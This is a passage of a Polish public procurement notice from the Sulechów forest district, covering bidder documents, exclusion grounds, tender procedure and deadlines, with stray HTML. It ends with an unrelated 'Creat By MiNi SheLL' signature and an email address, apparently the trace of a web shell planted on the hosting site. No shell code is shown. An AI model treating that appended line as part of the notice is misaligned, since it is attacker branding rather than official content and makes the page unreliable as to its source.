Zgodnie z § 9 ust. 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. poz. 231) w postępowaniach  o udzielenie zamówienia publicznego na roboty budowlane wszczynanych w okresie 12 miesięcy od dnia wejścia w życie niniejszego rozporządzenia, wykonawca, w miejsce poświadczeń, o których mowa w § 1 ust. 2 pkt 1 rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. poz. 231), może przedkładać dokumenty potwierdzające należyte wykonanie dostaw lub usług oraz wykonanie robót budowlanych zgodnie z zasadami sztuki budowlanej i ich prawidłowe ukończenie, określone w § 1 ust. 1 pkt. 2 rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2009 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz. U. Nr 226, poz. 1817).
W razie konieczności, szczególnie gdy wykaz lub dowody, budzą wątpliwości zamawiającego lub gdy z poświadczenia albo z innego dokumentu wynika, że zamówienie nie zostało wykonane lub zostało wykonane nienależycie, zamawiający może zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego roboty budowlane były lub miały zostać wykonane, o przedłożenie dodatkowych informacji lub dokumentów bezpośrednio zamawiającemu.

c)	wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacją na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 6,

d)	oświadczenia, że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - załącznik nr 8,

g)	wykonawca, wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 Pzp, albo informację o tym, że nie należy do grupy kapitałowej. Przepis art. 26 ust. 3 i 4 Pzp stosuje się.

h)	oświadczenie o przynależności - braku przynależności do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów wraz z listą podmiotów należących do tej samej grupy kapitałowej - w przypadku przynależności do grupy kapitałowej - załącznik nr 7.

2.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach o których mowa w art. 24 ust.1 ustawy Pzp, powinni przedłożyć:

a)	oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego wykonawcy, o których mowa w art. 24 ust.1 Pzp -  załącznik nr 5.
    W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden  z nich nie może spełniać choćby jednej przesłanki do wykluczenia z postępowania na podstawie art. 24. ust.1 Pzp, oświadczenie o nie podleganiu wykluczeniu składają wszyscy wykonawcy,
b)	aktualnego odpisu z właściwego rejestru lub z centralnej ewidencji i informacji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub ewidencji w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy (wystawiony nie wcześniej niż 6 miesięcy przed upły?wem terminu składania ofert) - wymagana forma dokumentu  oryginał lub kopia poświadczona przez wykonawcę,
c)	aktualnego zaświadczenia właściwego naczelnika urzędu skarbowego, potwierdzającego że wykonawca nie zalega z opłacaniem podatków lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) - wymagana forma dokumentu oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę,
d)	aktualnego zaświadczenia właściwego oddziału ZUS lub KRUS potwierdzające,  że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub zaświadczeń, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert) - wymagana forma dokumentu oryginał lub kopia poświadczona za zgodność z oryginałem przez wykonawcę.
	
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium
Rzeczypospolitej Polskiej zamiast dokumentów, o których mowa w pkt. 2 ppkt. b, c, d, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości oraz nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenia społeczne i zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, oraz że nie orzeczono wobec niego zakazu ubiegania się o zamówienie. 
Dokumenty, o których mowa dotyczące odpisu z rejestru powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a dotyczące składek na ubezpieczenia społeczne i zdrowotne oraz podatków powinny być wystawione nie wcześniej niż 3 miesiące przed składaniem ofert. 
Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed notariuszem, właściwym organem sadowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawione z odpowiednią datą wymaganą dla tych dokumentów.
Wykonawca może polegać na wiedzy i doświadczeniu, zdolnościach finansowych oraz na potencjale technicznym i ludzkim innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne  zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie postanowienia zawiera wzór umowy stanowiący załącznik nr 2 do SIWZ. Złożenie oferty jest równoznaczne z zaakceptowaniem wszystkich warunków umowy.
2.	Na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych każda ze stron może żądać zmian w umowie w stosunku do treści oferty na podstawie, której dokonano wyboru wykonawcy jeżeli wystąpi co najmniej jedna z okoliczności wymienionych w § 9 ust. 1 wzoru umowy, stanowiącego załącznik do SIWZ.
3.	Zakres istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, mogących stanowić podstawę do przedłużenia terminu wykonania umowy, stanowią okoliczności opisane w § 9 ust. 2, 3, 4 wzoru umowy, będącego załącznikiem do SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.lasy.gov.pl/pl/bip/dg/rdlp_zielona_gora/nadl_sulechow/zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Sulechów 
ul. Bankowa 2
Sulechów
pok. 102.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.12.2013 godzina 09:00, miejsce: Nadleśnictwo Sulechów 
ul. Bankowa 2
Sulechów
pok. 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Niniejsze postępowanie nie ma na celu zawarcia umowy ramowej, o której mowa w art. 99 i następnych ustawy Pzp. 
2. Zamawiający nie przewiduje wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
3. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu. 
4. Nie przewiduje się zaliczek na poczet wykonania postępowania. 
5. Zamawiający nie przewiduje wymagań określonych w art. 29 ust.4 ustawy. 
6. Zamówienie nie jest finansowane ze środków Unii Europejskiej. 
7. Niniejsze postępowanie nie ma na celu ustanowienia dynamicznego systemu zakupów. 
8. Zamawiający przewiduje zamówienia uzupełniające do  50% wartości dla każdej z części..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com